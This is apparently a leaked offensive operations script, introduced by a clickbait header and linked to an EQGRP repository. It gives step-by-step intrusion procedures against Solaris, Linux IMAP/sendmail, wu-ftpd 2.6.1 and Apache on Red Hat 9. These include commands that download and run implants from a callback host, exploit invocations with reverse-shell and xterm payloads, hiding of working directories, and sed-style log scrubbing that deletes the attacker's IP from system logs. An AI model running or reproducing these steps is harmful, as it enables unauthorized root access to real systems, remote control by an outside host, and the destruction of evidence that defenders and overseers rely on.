DO YOU WANT THE JELLYFISH ALL CODE SOURCE?

### Imap masqerade
	### Bring a local to get root
	### for solaris
	nc -v -l -p 53 < ../up/noserver-sparc-sun-solaris2.5.1
	noclient -l 25
	telnet TARGET_IP 143
	A000 LOGIN user password
	A001 EXAMINE /etc/mail/sendmail.cf
	A002 FETCH 1 RFC822
	A003 EXAMINE /etc/passwd
	A004 FETCH 1 RFC822
	A003 EXAMINE /etc/shells
	A004 FETCH 1 RFC822
	A005 EXAMINE .forward
	A006 CREATE .forward
	A007 CREATE .forward
	A008 APPEND .forward (\Seen) {145}
	"| /bin/ksh -c '/bin/cat

/tmp/sendmail;chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f /tmp/sendmail'" A009 DELETE .forward A010 LOGOUT telnet PITCH_IP 25 HELO helo MAIL FROM: user@itt.beta.net RCPT TO: user@itt.beta.net DATA . QUIT # echo -e "HTTP/1.0 200\n" > new # cat new noserver-2.6.1-i586.pc.linux.gnu.redhat-5.0 > sendmail # nc -v -l -p 53 < sendmail # noclient -l 25 telnet TARGET_IP 143 A000 LOGIN user password A001 EXAMINE /etc/mail/sendmail.cf A002 FETCH 1 RFC822 A003 EXAMINE /etc/passwd A004 FETCH 1 RFC822 A003 EXAMINE /etc/shells A004 FETCH 1 RFC822 A100 LIST /etc/smrsh * A005 EXAMINE .forward A006 CREATE .forward A007 CREATE .forward A008 APPEND .forward (\Seen) {11} "| slocal" A100 CREATE .maildelivery A101 APPEND .maildelivery (\Seen) {37} To user pipe A >/home/user/.g A102 LIST "" % A102 RENAME .g .procmailrc A008 APPEND .procmailrc (\Seen) {128} :0 c |cd /tmp;wget http://PITCH_IP:53/sendmail; chmod +x /tmp/sendmail;D=-cPITCH_IP:25 PATH=/tmp sendmail;rm -f sendmail A009 DELETE .forward A009 DELETE .maildelivery A009 DELETE .procmailrc A010 LOGOUT telnet localhost 25 HELO helo MAIL FROM: user@localhost.localdomain RCPT TO: user@localhost.localdomain DATA . QUIT telnet fawn 143 A000 LOGIN user password A001 EXAMINE /etc/mail/sendmail.cf A002 FETCH 1 RFC822 A003 EXAMINE /etc/passwd A004 FETCH 1 RFC822 A003 EXAMINE /etc/shells A004 FETCH 1 RFC822 A102 LIST "/usr/bin/X11" % A005 EXAMINE .forward A006 CREATE .forward A007 CREATE .forward A008 APPEND .forward (\Seen) {50} "| /usr/bin/*11/xterm -display PITCH_IP:26000" A009 DELETE .forward A010 LOGOUT telnet fawn 25 HELO helo MAIL FROM: user@fawn.beta.net RCPT TO: user@fawn.beta.net DATA . QUIT ### cleanup possible logging in /var/adm/messages (should blend in if it fails) ########################################################### # EXPOUNDATOM ########################################################### # Requires the target to have the wu-2.6.1 FTP service running # Requires anonymous ftp access (determined if exploit works) # -scan ftp TARGET_IP # A maximum of two tries can be attempted. # # Syntax # ./wu-261-linux -h # For target list: # ./wu-261-linux -t0 -h # No redirection: ./wu-261-linux TARGET_IP 21 VERSION # w/ redirection: -tunnel l 21 TARGET_IP # Locally: ./wu-261-linux -a -d 127.0.0.1 ./wu-261-linux -t17 -d 127.0.0.1 # SHould give you root; need to upload nopen unset HISTFILE unset HISTSIZE unset HISTFILESIZE cd /tmp mkdir WORK_DIR cd /tmp/WORK_DIR pwd which uudecode uncompress # gedit sendmail uudecode; ls -latr uncompress sendmail.Z ls -la chmod 700 sendmail PATH=. sendmail # IF it complains about the user/pass correct, then it's not vulnerable to # our pair that we try to send it; # Cleanup: # /var/log/messages (look for ftp access) # /var/adm/utmpx, wtmpx # /var/log/secure ################################################### ### EMBERSNOUT ################################################### # must verify that box is RH9.0(SHRIKE) and that # httpd is "Apache/2.0.40 (Red Hat Linux) -scan telnet TARGET_IP -scan ssh TARGET_IP -scan ssl TARGET_IP # Notes: # this indicates it's RH9.0 but could be either Psyche or Shrike: # (Linux release 2.4.20-8custom #3 SMP Thu Aug 28 13:56:20 EDT 2003) # seeing this indicates (Shrike) because the version is bundled with it: # SH-1.99-OpenSSH_3.5p1 # this version of Apache is needed but Psyche comes with 2.0.40-8 and # Shrike comes with 2.0.40-21; the release in not determinable from # a scan; just verify it's what is expected: # Server: Apache/2.0.40 (Red Hat Linux) # # op box should work - depends if python is included rpm -qf /usr/bin/python # should see: python-base-2.2-9mdk # if you want it to pop an xterm back to your screen: # - make sure 6000 is listening # - run xhost + ./es.py Arguments: ['./es.py'] Usage -> ./es.py ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd" where... ip............target IP address port..........target httpd TCP port number (usually 443) packet_size...attack packet length in bytes start_ebp.....guessed %ebp value to start with end_ebp.......guessed %ebp value to end with ebp_inc.......how many stack bytes to bump %ebp each time hex_pad_byte..packet filling byte (0x0 will do randomized fill) "cmd".........ASCII command string to be executed on target ### Locally netstat -an |grep 6000 xhost + ########### REDIRECTED: ### Redirector: -tunnel l 443 TARGET_IP r 6006 127.0.0.1 6000 r NETCAT_PORT ### In a local scripted window, set up a netcat to listen for a connection: nc -vv -l -p NETCAT_PORT ### Locally (choose a method): ### This one will send command results back to a netcat window (not interactive) ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet PITCH_IP NETCAT_PORT" ### This one gives you an interactive window: ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)" # or for ksh: ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(ksh -c "sh &0 2>&0")" ### This one pops back an xterm (be patient for it to pop back and keep mouse clear of window): ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "/usr/bin/X11/xterm -display PITCH_IP:6 -e /bin/sh" ############ No Redirection: ./es.py TARGET_IP 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 (/bin/uname -a; /usr/bin/id; /bin/ps -auxww; /bin/w)|/usr/ bin/telnet LOCALIP NETCAT_PORT" ./es.py TARGET_IP 443 5000 HIT_STRING 0xbffffff0 0x4 0x0 "(/usr/bin/X11/xterm -display LOCALIP:0 -e /bin/sh)" ./es.py 127.0.0.1 443 5000 0xbfffe000 0xbffffff0 0x4 0x0 "(sh &0 2>&0)" ### if the exploit stalls after a bit, hit Ctl-C to wake it up, which ### prompts you if you want to continue - hit 'y' ### watch for a connection back to your netcat window ### Once you have access........ ### you need to first clean extraneous processes started by httpd ### run this to help clean: unset HISTFILE unset HISTSIZE unset HISTFILESIZE pwd exec 3<&- 4<&- 5<&- 6<&- 7<&- 8<&- 9<&- 10<&- 11<&- 12<&- 13<&- 255<&- /usr/sbin/lsof |grep ^sh uname -a; id mkdir -p /tmp/.httpd-lock; chmod 700 /tmp/.httpd-lock; ls -lctra /tmp cd /tmp/.httpd-lock; pwd which uudecode uncompress #telnet PITCH_IP NETCAT_PORT #uncompress crond.Z; chmod 700 crond; ls -la # if no uudecode, use this ### locally: # nc -l -vv -p NETCAT_PORT < crond ### back on target window: #/bin/cat /tmp/.httpd-lock/crond chmod 700 crond PATH=. crond PATH=. D=-cPITCHIP:NOPEN_PORT crond rm crond -nstun TARGET_IP -nrtun NOPEN_PORT noclient TARGET_IP ### need to elevate so you can clean logs (use eventstart - ptrace won't work on RH9) ### Logging: -lt /var/log/httpd /var/log/httpd/ssl_access_log /var/log/httpd/ssl_request_log /var/log/httpd/ssl_error_log /var/log/httpd/error_log -lt /var/log /var/log/messages /var/log/secure /var/log/maillog egrep -v PITCH_IP /var/log/httpd/ssl_access_log > t; cat t > /var/log/httpd/ssl_access_log egrep -v PITCH_IP /var/log/httpd/ssl_request_log > t; cat t > /var/log/httpd/ssl_request_log egrep -v PITCH_IP /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v Segmentation /var/log/httpd/error_log > t; cat t > /var/log/httpd/error_log egrep -v PITCH_IP /var/log/httpd/ssl_error_log > t; cat t > /var/log/httpd/ssl_error_log egrep -v PITCH_IP /var/log/messages > t; cat t > /var/log/messages egrep -v PITCH_IP /var/log/secure > t; cat t > /var/log/secure egrep -v PITCH_IP /var/log/maillog > t; cat t > /var/log/maillog https://github.com/x0rz/EQGRP/blob/master/Linux/etc/opscript.txt